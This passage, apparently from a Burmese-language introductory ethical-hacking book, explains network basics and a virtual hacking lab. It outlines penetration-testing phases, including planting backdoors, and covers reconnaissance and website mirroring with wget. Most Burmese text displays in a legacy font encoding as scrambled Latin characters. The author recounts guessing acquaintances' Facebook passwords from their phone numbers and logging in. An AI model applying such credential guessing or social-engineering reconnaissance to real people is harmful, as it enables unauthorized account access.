ydkjyD; em;vnfvG,fatmif uRefawmfhq&mwpfa,muf &Sif;jyzl;wJh
yHkpHav;eJY jyefvnf &Sif;jyyg&ap/ txufyg network (small network)
uav;wpfckrSmaygh/ Adam eJY Bill qdkwJhol ESpfa,muf&JU uGefysLwmcsif;
csdwfqufMur,f qdkygpdkY/

yHkav;rSm azmfjyxm;ovdkygyJ/ Adam u olY&JU uGefysLwmudk router uae

xkwfay;xm;wJh wireless connection eJY csdwfqufxm;jyD; Bill uawmh
olY&JUuGefysLwmudk router uae BudK;eJY csdwfqufxm;ygw,f/ csdwfqufyHkcsif;
rwlnDayr,fh olwdkYu same network rSm &SdaeMuygw,f/ tao;pdwfutpawmh
ajymrjyawmhbl;aemf/ tao;pdwfavhvmvdkygu Networking eJY ywfoufwJh
oifwef;awG? jrefrmvdk pmtkyfawG &Sdygw,f/
ck Fig: 5.1 t& router &JU IP address u 192.168.1.1 jzpfygw,f/ 'gudk
private address vdkY ac:qdkjyD; olYudk tifwmeufrSm toHk;jyKvdkY r&ygbl;/ yHkrSm
qufMunfh&if Adam &JU IP address u 192.168.1.11 jzpfjyD; Bill &JU uGefysLwmu
192.168.1.10 vkdkY awGY&ygr,f/ 'gawGu private IP address awGyg/ olwdkYudk
tifwmeufrSm toHk;jyKEdkifapzdkYtwGufawmh router u Network Address
Translation (NAT) udk vkyfaqmifay;&ygw,f/ qdkvdkwmu Adam eJY Bill wdkY&JU IP
address awGudk tifwmeufrSm toHk;jyKEdkifr,fh address awGtjzpf jyefvnf
ajymif;ay;&ygw,f/ router uae NAT jyKvkyfjcif;r&SdbJ user u xdk private IP
address udk tifwmeufrSm toHk;jyKzdkY BudK;pm;MunfhwJhtcg Internet Router eJY
tjcm;aom device awGuae connection udk jiif;qefrSmjzpfvdkY communication
jzpfoGm;ygvdrfhr,f/
Internal Network eJY External Network udk router u oD;jcm;pD
cGJxm;ygw,f/ router u private network udk internet csdwfqufvdkY &Edkifapr,fh
public network tjzpf vrf;aMumif;ajymif;ay;ygw,f/ 'gaMumifh Adam eJY Bill
wdkY&JU IP Address u router &JU Internal Interface IP Address awGom
jzpfygw,f/ xdk address awGudkawmh Default Gateway vdkY ac:qdkjyD; users (Adam
& Bill) awG&JU uGefysLwmESpfvHk;twGuf network card awGudk configuration
vkyfwJhtcgrSm toHk;jyK&ygw,f/
Default Gateway udk jrifomatmif azmfjy&&ifawmh vrf;wpfvrf;om
&SdwJh jrdKUi,fav; tjzpf jrifa,mifMunfhEdkifygw,f/ jrdKUxJuae jyefxGufcGmvdkwJh
vlwpfa,muftzdkY vrf; udk od&SdzdkY vdktyfovdk network computer
awGtaeeJYvnf; local network &JU tjyifbufudk xGufcGmEdkifr,fh vrf;aMumif;udk
od&SdzdkY vdktyfygw,f/ tJ'guawmh default gateway ygyJ/
uGefysLwmawG[m wpfvHk;eJYwpfvHk; qufoG,fwJhtcg udef;*Pef;awGudk
toHk;jyKjyD; pum;ajymMuygw,f/ 'gudkvnf; pmzwfolwdkYtaeeJY od&SdjyD;
jzpfygvdrfhr,f/ function awG rSefuefpGm communicate vkyfEdkifapzdkYtwGuf
network [m a,bk,stm;jzifh name server or Domain Name Server (DNS) udk
toHk;cs&ygw,f/ pufawGu udef;*Pef;awGudkyJ od&Sdovdk uRefawmfwdkY
vlom;awGtwGufuvnf; udef;*Pef;awGudkcsnf; rSwfxm;zdkY tqifrajyygbl;/
'gaMumifh human readable format jzpfwJh www.google.com wdkY
www.facebook.com wdkY ponfjzifh ajymif;vJ&wmjzpfygw,f/ tJonf DNS
udkom roHk;bl;qdkygu vlawG[m website wdkif;&JU IP address awGudk
rSwfxm;&rSmjzpfjyD; rSwfrdEdkifacs tvGefenf;oGm;ygr,f/ 'gaMumifh Network card
wpfckudk manual configuration jyKvkyfvdkygu DNS or Name Server &JU
identification vdktyfygw,f/
network xJrSm &SdaewJh device awG&JU IP, Subnet Mask, Gateway, DNS
pwmawGudk DHCP u tvdktavsmuf cGJjcm;owfrSwfay;ygw,f/ Linux rSm IP
address udk MunfhEdkifr,fh command uawmh ifconfig yg/ Windows cmd
command uawmh ipconfig jzpfygw,f/
ifconfig udk vufawGY rpwifcif BudKwif ajymjyxm;p&mav;awG
&Sdygw,f/ uRefawmfwdkY toHk;jyKaeMuwJh connection yHkpHawGaygh/ uRefawmfwdkY&JU
uGefysLwmrSm tifwmeuf &atmif b,fvdk oHk;vJ vdkY ar;&if t"dutm;jzifh tajz
tkyfpk ESpfpk xGufvmygr,f/ bmawGvJqdkawmh 1/ uRefawmfu zkef;uae wifi
vTifhjyD; uGefysLwmeJY csdwfoHk;ygw,f/ (odkYr[kwf) tjcm; wifi uGef,ufwpfckckeJY
csdwfqufjyD; oHk;ygw,f/ 2/ uRefawmfuawmh cable eJY toHk;jyKw,f/ (odkYr[kwf)
uRefawmfuawmh uRefawmfhzkef;eJY uGefysLwmudk USB BudK;wyfjyD; USB tethering
vkyf oHk;ygw,f/ txufyg tajzESpfrsdK;om t"du &ygvdrfhr,f/ tvG,fqHk;
ajym&&if BudK;rJh wifi pepfeJY BudK;wyfoHk;&wJh cable pepfqdkjyD; cGJEdkifygw,f/
uRefawmfwdkY toHk;jyKr,fh Kali Linux rSm BudK;rJh wifi interface udk wlan0 (w lan
zero) vdkY ac:qdkjyD; cable BudK;eJY csdwfqufoHk;EdkifwJh network interface ukdawmh
eth0 vdkY ac:qdkoHk;EIef;ygw,f/ uJ terminal rSm ifconfig vdkY &dkufMunfh&atmif/
ifconfig (enter) aygh/

txufyg yHkrSm Munfh&if eth0, wlan0 eJY lo qdkjyD; awGYygvdrfhr,f/ lo

qdkwmuawmh Local Loopback udk ac:qdkwmjzpfjyD; uRefawmfwdkY uGefysLwmu
olYudk,fol communicate vkyfEdkifzdkYtwGuf toHk;jyKwJh Virtual Network Interface
wpfckom jzpfygw,f/ local machine ay:rSm running vkyfaewJh server awGudk
csdwfqufEdkifzdkY olYudk t"du toHk;jyKygw,f/
&IyfoGm;ovm;rodbl;As/ enf;enf;awmh ydkjyD; &Sif;jyzdkYvdkjyDxifw,f/
'Dvdkyg/ uRefawmfwdkY uGefysLwmudk tifwmeuf csdwfqufoHk;aewJh yHkpH ESpfck &Sdw,f/
wlan0 & eth0 udk &Sif;jyjyD;jyDaemf/ tJonf wlan0 wdkY eth0 wdkY qdkwmu network
interface awGyg/

(wlan0) wireless network interface card (eth0) network interface card

txufyg yHk ESpfyHkrSm wlan0 eJY eth0 wdkY connect to internet
jyKvkyfEdkifapzdkY toHk;jyKxm;wJh network interface card awGudk azmfjyay;
xm;ygw,f/ qdkvdkwmuawmh olwdkYawG[m hardware awG udk,fpD&SdrS
tvkyfvkyfEdkifw,fqdkwmyg/ Oyrm wifi card ryg&if wifi toHk;jyKvdkY r&Edkifygbl;/
eth0 uawmh uGefysLwmwdkif;rSm yg0ifygw,f/ (,aeYacwf Laptop & Notebook
awGrSmawmh wifi card yg yg0ifMuygw,f/)
lo taMumif; qufygr,f/ wlan0 wdkY? eth0 wdkY[m csdwfqufxm;wJh
uGef,uf jywfawmufoGm;wJhtcg toHk;jyKvdkY r&Edkifawmhygbl;/ 'gayr,fh lo
uawmh local rSm run aewJh server awGudk ac:oHk;EdkifaeqJ jzpfygw,f/ lo twGuf
oD;oefY hardware rvdktyfygbl;/ lo uvnf; tjcm; hardware awGudk
udk,fpm;jyKrSm r[kwfygbl;/ IP address taMumif; jyefquf&atmifyg/
tJonfawmh uRefawmfwdkYtaeeJY rjzpfrae odrSwfxm;oifhwmu wlan0
eJY eth0 rSm uRefawmfwdkY bmudk toHk;jyKaevJqdkwmyg/

uRefawmfwdkY ck toHk;jyKr,fh Kali Linux rSmawmh ifconfig

azmfMunfhvdkufwmeJY etho, lo, wlan0 qdkwmawGudk awGYjrif&rSmjzpfygw,f/
uRefawmfwdkYu eth0 udk oHk;ae&if eth0 rSm IP address awGY&ygr,f/ ckyHkxJrSmawmh
uRefawmfu wifi udk toHk;jyKxm;wmrdkY wlan0 rSm awGYjrif&rSmjzpfygw,f/
tm;vHk;udk rMunfhcsifbl;/ uRefawmfwdkY toHk;jyKaewJh interface
wpfckwnf;udkom Munfhcsifw,fqdk&ifawmh uRefawmfwdkYtaeeJY ifconfig wlan0 (or)
ifconfig eth0 qdkjyD; MunfhEdkifygw,f/ wpfckpDMunfhvnf; twlwlyJ rdkY
azmfrjyawmhbl;aemf/ jyefquf&&if uRefawmftoHk;jyKaewJh wlan0 rSm 'kwd,
pmaMumif;rSmMunfhwJhtcg inet 192.168.10.150 netmask 255.255.255.0
broadcast 192.168.10.2555 qdkjyD; awGY&rSmjzpfygw,f/ a&SUqHk;u inet
192.168.10.150 qdkwmu uRefawmfh&JU vuf&Sd IP address aygh/ pm&IolwdkY&JU IP
address uawmh 192.168.--.-- jzpfEdkifygw,f/ VMWare (or) Virtualbox
rSmqdk&ifawmh tm;vHk;uGJcsifvnf; uGJjym;aeEdkifygw,f/ udk,fh address udk
udk,foHk;&rSmaygh/ :)

2.Hacking Lab
'DtaMumif;eJY ywfoufjyD;awmh tao;pdwfazmfjy&if pmrsufESmawG
rsm;jyD; usefwJh t&mawGtwGuf pmrsufESm rusefrSmpdk;wmaMumifh
jyKvkyfenf;awGudk azmfrjyawmhbl;aemf/ www.khitminnyo.com rSm Hacking Lab
zefwD;jcif;enf;vrf;awGudk Munfh&IEdkifygw,f/ hacking Lab qdkwmuawmh
uRefawmfwdkYtaeeJY Hacking avhvm&if; uRefawmfwdkY&JU prf;oyfrIawGudk
prf;oyfvkyfaqmifwJhtcg rnfolYudkrQ rxdcdkufapbJ vkyfaqmifEdkifapzdkYtwGuf
uRefawmfwdkYpufxJrSmwif wnfaqmufxm;wJh Virtual Laboratory udk
qdkvkdygw,f/
t"dutm;jzifhawmh hacking lab tjzpf VirtualBox (or) VMWare udk
toHk;jyKMuygw,f/ tJonfrSm t"du wifavh&SdwmawGuawmh uRefawmfwdkY&JU
Host OS ay: rlwnf uGmjcm;Edkifygw,f/ uRefawmfwdkYu Windows udk Host tjzpf
oHk;xm;w,fqdk&ifawmh VM awGtjzpf Kali Linux, Windows (prf;oyf&ef) ,
Metasploitable, DVWA pwmawG jzpfygw,f/ uRefawmfwdkYu Host tjzpf Kali
udk toHk;jyKxm;w,fqdk&ifawmh VM rSm Windows, Metasploitable, DVWA
pwmawGudk Hacking Lab taeeJY xnfhoGif;xm;Edkifygw,f/
rdrdwdkY puf\ RAM ESifh HDD memory t& bmawG b,fvdk wifjyD;
toHk;jyKoifhvJqdkwmudk uRefawmfwdkY&JU Facebook Group uaejzpfap? viber uae
jzpfap aqG;aEG;Edkifygw,fcifAsm/
CHAPTER 7: Penetrating Testing Life-cycle

Steps performed by Hackers

Hacker awG[m wpfOD;eJYwpfOD; rwlnDMuygbl;/ olwdkYrSm rwlnDwJh

motives awG? techniques awGeJY abilities awG &SdMuygw,f/ tJovdkygyJ/
vkyfaqmifwJh vkyfaqmifyHkawGvnf; uGmjcm;rI &SdwwfMuygao;w,f/
a,bk,stm;jzifh Hacker awG vkyfavh&SdwJh tqifhawGudk 1.Reconnaissance,
2.Scanning, 3.Access and escalation, 4.Ex-filtration, 5.Sustainability,
6.Assault & 7.Obfuscation qdkjyD; 7qifh cGJjcm;avh&SdMuygw,f/ 'DpmtkyfxJrSmawmh
Penetrating Testing (Ethical Hacking) udk tajccHjyD; t"du vkyfaqmifcsuf
tqifh 5qifh tjzpfom tusOf;csHKU azmfjyay;oGm;ygr,f/

Phase 1. Reconnaissance
trIwpfck jzpfw,f qdkMuygpdkY/ xdktrIrSm rouFmzG,f tkyfpk (group)
wpfckudk awGYw,fqdkMuygpdkY/ uRefawmfwdkYu Oya'bufawmfom;awG taeeJY
awG;Munfh&atmif/ yxrqHk; bmvkyfrvJ/ xdk tkyfpkudk wdkuf&dkuf oGm;zrf;rvm;/
'Dae&mrSm uRefawmfwdkYpOf;pm;&rSmu bmtcsuftvufrS &Sdrxm;bJeJY oGm;zrf;&if
udk,fh&SL;udk,fywfjyD; udk,fhbuf jrSm;OD;jyefvnfvmrSmjzpfovdk ta&;BuD;aom
uGif;qufawGyg jywfoGm;rSmjzpfygw,f/
'Dawmh uRefawmfwdkY bmvkyfMurvJ/ xdk rouFmzG,ftkyfpkudk apmifhMunfh
&ygr,f/ olwdkYtaMumif; &atmif t&if pHkprf;&ygr,f/ olwdkYu bmawGvkyfaqmif
MuvJ/ bmawGudk toHk;jyKaeMuvJ/ olwdkYrSm bmvufeufawG &SdrvJ/ olwdkYawG&JU
aemufuG,frSm bmawG&Sdao;vJ/ ponfjzifh uRefawmfwdkY target xm;wJh tkyfpkeJY
ywfoufqufEG,forQ tcsuftvuftm;vHk;udk &SmazGpkaqmif;&rSm jzpfygw,f/
xdkYtwlygyJ/ Penetrating Testing (Hacking) wpfckck vkyfaqmifr,f
qdkygu uRefawmfwdkY Target xm;wJh company (or) organization eJY ywfouf
qufEG,fwJh information wdkif;udk pkaqmif;xm;zdkY vdktyfygr,f/ xdkodkY information
pkaqmif;wJhtcg tifwmeufuae &SmazGpkaqmif;Edkifwm&Sdovdk jyifyrSm &SmazG
pkaqmif;&wmawGvnf; &SdEdkifygw,f/ tJonfawmh uRefawmfwdkYtaeeJY yxrqHk;
vkyfaqmif&r,fhtqifhu Reconnaissance (or) Information Gathering (or)
Footprinting jzpfygw,f/
tao;pdwfudk oufqdkif&mtcef;awGrSm xyfrH aqG;aEG;oGm;ygr,f/
Phase 2. Scanning

&efolYe,fajreJY uyfvsuf&SdwJh awmifylpmav;ay:rSm a&muf&SdaewJh

ppfom;wpfa,mufudk jrifa,mifMunfhyg/ Only one aemf/ olYvufxJrSm vrf;nTef
ajryHknTef;wpfck ygvmovdk olYqDrSm rSefajymif;wpfvufvnf; ygvmygw,f/
&efolawG tvG,fwul jrifroGm;zdkYtwGuf xlxyfodyfonf;wJh jcHKykwfawGMum;rSm
ykef;uG,f&if; olYwyfqDudk owif;jyefydkYaeygw,f/
&efolpcef;u ajryHknTef;xJutwdkif; wlnDaMumif; (odkYr[kwf)
ajryHknTef;xJu b,fae&mrSm jzpfaMumif;? &efolYtiftm;onf cefYrSef;ajctm;jzifh
b,favmuf&SdaMumif;? taqmuftOD; b,fESck jrifawGY&aMumif;? &efolY
uif;pcef;awG b,fESck&SdjyD; b,fae&mawGudk t"du apmifhMunfhvsuf&SdaMumif;?
ponfjzifh owif;jyefydkYygw,f/
'DjzpfpOfuav;rSmMunfh&if azmfjyyg ppfom;rSm mission wpfck
&Sdaewmudk odEdkifjyD; olYtaeeJY BudKwifowif;&&Sdxm;wJh tcsuftvufeJY
ajrjyifowif; (vufawGY tajctae) eJY uGm[rI &Sdr&Sd pwmawGudk od&Sdatmifvkyf
zdkY wm0efwpfck &Sdaewm awGY&ygr,f/ olYwm0efu wdkufcdkufzdkY r[kwfao;ygbl;/
tvm;wlygyJ/ Penetrating Testing jyKvkyfawmhr,fqdkyguvnf;
yxrtqifh (Phase 1) rSm &&SdcJhwJh owif;tcsuftvufawGtay: tajccHjyD;
Target network & information system awGudk Scan jyKvkyfygw,f/ 'gu Phase 2
aygh/ 'DtqifhrSmawmh Scanning jyKvkyfEdkifwJh tool awGudk toHk;jyKjyD; Target's
Network & system infrastructure udk ydkjyD; od&SdEdkifzdkY BudK;pm;&ygr,f/ 'grSom
aemufwpfqifhrSm b,fvdk exploit vkyf&r,fqdkwmudk qHk;jzwfEdkifrSm jzpfygw,f/
tao;pdwfudkawmh oufqdkif&mtcef;awGrSm qufvuf
azmfjyay;oGm;ygr,f/

Phase 3. Exploitation

wu,fh ppfom;awGtwGufawmh 'DtqifhrSm wdkufcdkufaewmvnf;

jzpfaumif; jzpfaeEdkifygw,f/ 'gayr,fh Ethical Hacking rSmawmh tenf;i,f yHkpH
ajymif;vdkuf&atmif/ 'DtqifhrSmawmh apmapmu ajymcJhwJh ppfom;av;[m
rSdefysysva&mif eJY tHkYaewJh wdrfwdkufawGudk tumtuG,f,ljyD; &efolYpcef;
pnf;&dk;tem;udk csOf;uyfvmygw,f/ olBudKwifavhvmcJhwJh uif;apmifhawG&JU
taetxm;ay: rlwnfjyD; tm;enf;wJh bufuae auGYywfvmcJhyg/
ronf;ruGJva&mif tjyif xlxyfaewJh wdrfawGuyg olYudk
ulnDay;aewmaMumifh pnf;&dk;udk ausmfjyD; 0ifEdkifcJhovdk b,folrS
rvmEdkifbl;xifjyD; Edk;Mum;rIr&SdwJh tapmifhawGaMumifh yifrtaqmuftOD;&JU
aemufbufwHcg;aygufudk zGifhjyD; 0ifa&mufEdkifcJhygw,f/ taqmuftOD;xJu
ta&;ygwJh tcsuftvufawG yg0ifwJh zdkifudk &,lcJhjyD; vmvrf;twdkif; b,folrS
rodatmif jyefxGufvmEdkifcJhygw,f/ qdkMuygpdkY/
txufyg jzpfpOf[m Hacking &JU Phase 3 jzpfygw,f/ 'D Phase &JU
&nf&G,fcsufu target system xJudk 0ifa&mufjyD; tcsuftvufawG &,lvsuf
b,folrS rodatmif jyefxGufvmEdkifzdkY jzpfygw,f/ 'Dvkd vkyfaqmifEdkifzdkYtwGuf
Target system &JU Vulnerability (tm;enf;csuf)awGt& exploit awGudk rSefuefpGm
toHk;jyKEdkifzdkY vdktyfygw,f/

Phase 4. Maintaining Access

apmapmu ajymcJhwJh &efolYpcef;xJ azmuf0ifedkifcJhwJh ppfom;av;&JU

tawGYtBuHKeJY a&;qGJxm;wJh yHkawGt& uRrf;usifwJh tif*sDeD,mawG[m yifr
taqmuftOD &JU tcsuftcsmtusqHk;tcef; atmufwnfhwnfhxd
ajratmufuae OrifvIdPfacgif; wl;Edkifygw,f/ &nf&G,fcsufuawmh
aemufwpfBudrf ydkrdkvG,fuljrefqefpGm xyfrH0ifa&mufEdkifzdkY jzpfygw,f/
tvm;wlygyJ/ Hacking &JU Phase 4 uvnf; target system xJudk
aemufwpfBudrf jyefvnf0ifa&muf&mrSm ydkrdk vG,fulapzdkYtwGuf Backdoor &
rootkit awGudk csefxm;EdkifcJhzdkY vdktyfygw,f/ 'grSom aemufwpfBudrf
xyfrH0ifa&mufvdkygu ydkrdkvG,fuljrefqefrSm jzpfygw,f/ 'g[m Maintaining
Access ygyJ/

Phase 5. Reporting

'Dtqifhudkawmh Ethical Hacker (Penetrating Tester) awGuom

vkyfaqmifavh&Sdygw,f/ Target system eJY ywfoufjyD; tay:rSm azmfjycJhwJh Phase
av;ckudk atmifjrifcJhjyD;wJhaemuf Target system &JU wm0ef&SdolawGxH qufoG,fjyD;
Report ay;&ygw,f/ System &JU tm;enf;csufawG? 0ifa&mufcJhyHkawGeJY
b,ftqifhxd vkyfaqmifEdkifr,fqdkwm? wu,fwrf;wdkufcH&&if bmawG
b,favmufxd qHk;&IH;oGm;Edkifr,fqdkwmawGudk Target company (or) Organization
u od&SdawG;rdEdkifapzdkY jzpfygw,f/
'guawmh Steps performed by Hackers udk tusOf;csKyf
azmfjycJhjcif;omjzpfygw,f/ 'DaqG;aEG;rIav;udk 'Dae&mrSm &yfem;vdkuf&atmif/
aemufxyf CHAPTER wpfckrSm first step udk aqG;aEG;oGm;ygr,f/
CHAPTER 8: Reconnaissance

Introduction

ppfyGJwpfck rpwifrD &efoleJY ywfoufwJh owif;tcsuftvuf

rSeforQudk &EdkiforQ &atmif pkpnf;&ovdkygyJ/ Penetrating Tester
wpfa,muftaeeJYvnf; Pen-testing wpfck rpwifrD Target system eJY
ywfouforQ information tm;vHk;udk pkpnf;&ygw,f/ Information
tawmfrsm;rsm;udk Google rSm &Edkifovdk Social Media awGjzpfwJh Facebook,
twitter, ... pwmawGuaevnf; &&SdEdkifygao;w,f/
tcsuftvuf pkaqmif;jcif; (Information Gathering) udk Footprinting
vdkYac:qdkjyD; xdkodk tcsuftvufpkaqmif;wJh the whole process udkawmh
Reconnaissance vdkY ac:qdkwm jzpfygw,f/ 'gaMumifh tMurf;zsif;ajym&&if 'DoHk;ck
u twlwlygyJ/
'gaMumifh Reconnaissance qdkwm Target eJY ywfoufwJh information
rSeforQudk &EdkiforQ &atmif pkwJh Hacker awG&JU yxrqHk; ajcvSrf; jzpfygw,f/
Target vdkY qdk&mrSm target onf network (or) system wpfckck jzpfaeEdkifygw,f/
'DtqifhrSm &&Sdvmr,fh information awGu target's network infrastructure eJY
security udk map a&;qGJ&mrSm rsm;pGm taxmuftul&rSmjzpfygw,f/ 'D
information awGuaewpfqifh uRefawmfwdkY&JU target system udk 0ifa&mufEdkifr,fh
enf;vrf;awGudk zefwD;Edkifapygvdrfhr,f/
aumif;jyD/ 'gqdk uRefawmfwdkY b,ftcsuftvufawGudk pkaqmif;&rvJ/
Sensitive information awGu bmawGvJ/ Sensitive information qdkwmu
uRefawmfwdkY Tayget &JU network type, network devices & systems, employee
information (name, phone, email, etc...), physical & electronic security
systems, company (or) organization structure, departments, charts, IP space &
network topology tygt0if organizational infrastructure awG? organizational
partners, physical location awG pwmawG jzpfMuygw,f/
aumif;jyD/ tJonftcsuftvufawGu b,fu&rvJ/ tJonftcsuf
tvufawGudk b,fuae &rvJqdkawmh google eJY duck duck go wdkYvdk internet
search engine awGuaevnf; &&SdEdkifovdk company &JU website awG?
tvkyfac:pmawG uaevnf; od&Sd&,lEdkifygw,f/ company employee
awGxHuaevnf; &&SdEdkifao;ovdk company uae tvkyfxGufoGm;wm
rMumao;wJh olawG? tvkyfxJrSm (rdrdatmufuvlu rdrdxuf &mxl;wdk;oGm;vdkY)
rausreyf jzpfaewJh 0efxrf;rsdK;qDuaevnf; &&SdEdkifygao;w,f/ xdkodkY jyify
vlawGqDuae &,lEdkifzdkYtwGufawmh Social Engineering udk toHk;jyKMuygw,f/
Reconnaissance taMumif;udk tjynfhtpHkazmfjyr,fqdk&ifawmh
pmtkyfwpftkyfeD;yg; &Snfvsm;oGm;Edkifygw,f/ 'gaMumifh 'DavmufeJYyJ
&yfvdkufyg&ap/

Start with the Targets Own Website

yxrqHk;taeeJY uRefawmfwdkY target &JU own website udk

oGm;Munfh&atmif/ website awmfawmfrsm;rsm;rSm organizational chart awG
leader profile awGudk *kPf,lpGm azmfjyxm;avh&Sdygw,f/ 'gawG[mvnf; ta&;yg
jyD; 'DtcsufawGay: tajccHvQuf social media profile awGudk &SmazGEdkifovdk
social engineering udk toHk;jyKp&m vrf;zGifhEdkifrSmvnf; jzpfygw,f/
Oyrm ajym&&if tcsdKUaom Facebook User awGonf ckcsdefxd
passwords ae&mrSm phone number awGudk xm;aeMuqJjzpfygw,f/ tJovdkygyJ/
login jyKvkyf&wJh profile tcsdKUrSmvnf; zkef;eHygwfudk rSwfrdvG,fatmif password
jyKvkyfxm;MuwmawG &Sdwwfygao;w,f/ uRefawmf tjyifrSm &if;ESD;wJh facebook
fir tenf;i,fudk prf;oyfMunfhcJhzl;ygw,f/ id udk profile link uae ,ljyD;
passwords ae&mrSm olYzkef;eHygwfawGxJu vdkufjznfhMunfhvdkufawmh
zkef;eHygwfwpfvHk;rSm 0ifvdkY&aewmudk oGm;awGYrdygw,f/
'gaMumifh uRefawmfwkdYtaeeJY rdrdwdkYvkyfief;twGuf Login awG
xm;&wJhtcgawGrsdK;rSm zkef;eHygwfawGudk password rxm;rdzdkY ta&;BuD;ygw,f/
rdrdwdkY organization xJu device (computers) awGudk toHk;jyK&olawGudkvnf;
xdkenf;wl od&Sdatmif rSmxm;zdkY vdktyfygw,f/
tcsdKUaom website awGrSmawmh tvkyfac:pmawG &SdwwfMuygw,f/ xdk
tvkyfac:pmawGrSm vdktyfaom t&nftcsif;rsm; (odkYr[kwf) vkyfaqmif&rnfh
tvkyfrsm;udk Munfh&Ijcif;tm;jzifhvnf; xdk organization rSm toHk;jyKaewJh
technology awGudk od&SdEdkifygw,f/ Oyrm - systems administrator tvkyftwGuf
azmfjycsufrSm that are familiar with Active Directory and Windows server 2012
qdkwJh azmfjjycsufrsdK;[m xdk organization rSm tenf;qHk;awmh Windows server
2012 awmh toHk;jyKaew,fqdkwmudk od&SdEdkifygw,f/ tJonf tcsuftvufay:
rlwnfjyD; hacker u jzpfEdkifacs&SdwJh vulnerability awGudk pOf;pm;&ygw,f/
vulnerability ay: rlwnfjyD; wdkufcdkufEdkifr,fh exploit awGudkvnf;
pOf;pm;Edkifygw,f/
aemufjyD; uRefawmfwdkY EdkifiHrSm vuf&Sd toHk;jyKaewJh uGefysLwmawG&JU
windows ydkif;udk avhvmMunfh&atmif/ uRefawmfwdkYawGu Microsoft Windows
udk license version tjzpf 0,f,ltoHk;jyKol tvGefenf;ygw,f/ crack version
awGudkom toHk;jyKrI rsm;jym;jcif;? patch management ydkif; tm;enf;jcif; pwmawG
uvnf; vulnerable jzpfapwJhtxJrSm xdyfqHk;u &SdaeMuygw,f/

Website Mirroring

uRefawmfwdkY&JU Target website udk evaluate vkyfzdkY&mtwGuf website

wpfckvHk;udk offline toHk;jyKEdkifzdkYtwGuf copy ,lxm;Edkifygao;w,f/ full site
cloning vdkYvnf; ac:ygw,f/ xdkYtwGuf uRefawmfwdkY toHk;jyKr,fh Kali Linux rSm
build in yg0ifjyD;jzpfwJh wget command udk toHk;jyKEdkifygw,f/ rSwfxm;&rSmu
xdkodkY toHk;jyKwJhtcgrSm PHP script awGeJY zefwD;xm;wJh tcsdKUaom web page
server side programming awGudkawmh copy ul;EdkifrSm r[kwfygbl;qdkwmyg/
OyrmtaeeJY http://www.bible-history.com/ udk clone &dkufjyygr,f/

txufygyHkrSm Munfhyg/ uRefawmf toHk;jyKjyoGm;wJh command av;u

wget -m -p -E -k -K -np -v http://www.bible-history.com/ jzpfygw,f/

txufyg command udk avhvmMunfhr,fqdk&ifawmh wget qdkwJh main

command &JU aemufrSm options rsm;pGm uyfygaewmudk awGY&rSmyg/ wpfckcsif;pD&JU
zGifhqdkcsufudkawmh manual & help awGrSm Munfh&IEdkifygw,f/ tJtaMumif;
aemufrS qufajymyghr,f/ ckawmh wget eJY clone &dkufwJhtaMumif;udkyJ
quf&atmif/
 uRefawmfwdkY oHk;vdkufwJh wget eJY website udk offline tjzpf
a'gif;,lwJhtcg uRefawmfwdkY &,lr,fh site &JU tBuD;tao;eJY a'wm wnf&SdrI
pwmawGay: rlwnfjyD; tcsdef eJY tifwmeuf a'wm toHk;jyK&rI
uGmjcm;ygvdrfhr,f/ uRefawmf erlem azmfjycJhwJh bible-hsitory.com qdk&if Data MB
awG odyfrsm;vGef;wmaMumifh tcsddef em&DawGeJYcsDjyD; MumEdkifygw,f/
vdkif;raumif;bl;qdk&ifawmh tJonfxuf ydkjyD; MumjrifhEdkifygw,f/
jyD;qHk;oGm;wJhtcgrSmawmh command line aemufwpfaMumif;
ay:vmrSmjzpfjyD zdkifxJrSm zGifhMunfh&if atmufygtwdkif; awGYjrif&ygvdrfhr,f/

Command Manual and help

onfcgawmh website mirroring rSm azmfjyaqG;aEG;cJhwmeJY qufpyfjyD;
qufvufaqG;aEG;oGm;ygr,f/ wu,fqdk Linux Basic tcef;rSmuwnf;u azmfjy
oifhwmayr,fh ydkjyD; rSwfrdem;vnfatmif ckae&mxd o,fvmcJh&wm jzpfygw,f/
apmapmu uRefawmfwdkY oHk;cJhwJh wget eJY ywfoufjyD; aemufrSm wGJqufygvmwJh
options awGudk avhvmvkdygu Terminal rSm manual taeeJY azmfMunfhEdkifygw,f/
toHk;jyK&r,fh command u man command jzpfygw,f/ Oyrm - wget &JU manual
udk odvdkygu man wget vdkY &dkufxnfh&HkygyJ/

tJonftcg wget twGuf user manual ay:vmrSmjzpfjyD; txufrSm

oHk;cJhwJh -m qdkwm bmvJ/ -p qdkwm bmvJ ponfjzifh od&SdEdkifrSmjzpfygw,f/
manual xJu jyefxGufcsif&ifawmh q udk ESdyfvdkuf&HkygyJ/ tjcm; tool (command)
awGtwGufvnf; xdkYtwlygyJ/
aemufxyf option wpfcku help options yg/ tawmfrsm;rsm; oHk;MuwJh
optionsyg/ olYtoHk;u -h jzpfjyD; tcsdKUaom tool awGrSmawmh -h r[kwfygbl;/
'gaMumifh help options udk ac:oHk;csif&if toHk;rsm;qHk;u --help yg/ Oyrm wget
twGufqdk wget --help aygh/

xdkodkY help option ukdac:jyD;vnf; avhvmrSwfom;Edkifygao;w,f/

xdk help option rSmawmh wget aemufu command options awGudk

jrifawGYEdkifygw,f/ -v qdkwm version udk qdkvdkwm/ -o uawmh output file
ponfjzifhaygh/ 'Davmufqdk tay:rSm uRefawmf oHk;cJhwJh command options awGudk
&SmawGYEdkifjyDvdkY ,lqygw,f/ aemufxyf taMumif;t&mav;wpfck ajymif;
aqG;aEG;&atmif/

Google Search
'Dcgawmh uRefawmfwdkY trsm;pk toHk;rjyKjzpfMuwJh google search
taMumif;av; aqG;aEG;ygr,f/ Google Search rsm; igwdkY oHk;aeusyguGmvdkY
ajymcsifwJholvnf; &Sdaumif; &Sdygvdrfhr,f/ uJ Munfh&atmifaemf/
uRefawmfwdkYawG[m taMumif;t&mwpfckudk &SmazGcsifwJhtcg internet
search engine awGudk toHk;jyKMuygw,f/ Search engine toHk;jyKrIydkif;[m
uRefawmfwdkYeJY rpdrf;Muygbl;/ Oyrm - uRefawmfwdkY Facebook oHk;Muygw,f/
Account wpfckck (odkYr[kwf) taMumif;t&mwpfckckudk tjref&SmazGcsifwJhtcg
uRefawmfwdkY zkef;xJu Facebook Application xdyfrSm&SdwJh vufudkifrSefbDvl;0dkif;
uav;udk ESdyfjyD; Search vkyf &SmazGMuygw,f/ Oyrm - MPT, MRTV 4, Telenor
Myanmar, ... ponfjzifhaygh/ tJonftcg tqdkyg Search terms awGeJY
oufqdkif&m Page, account, post, movie, ... pwmawG ay:vmygawmhw,f/
'g[mvnf; Search Engine toHk;jyKjcif;ygyJ/
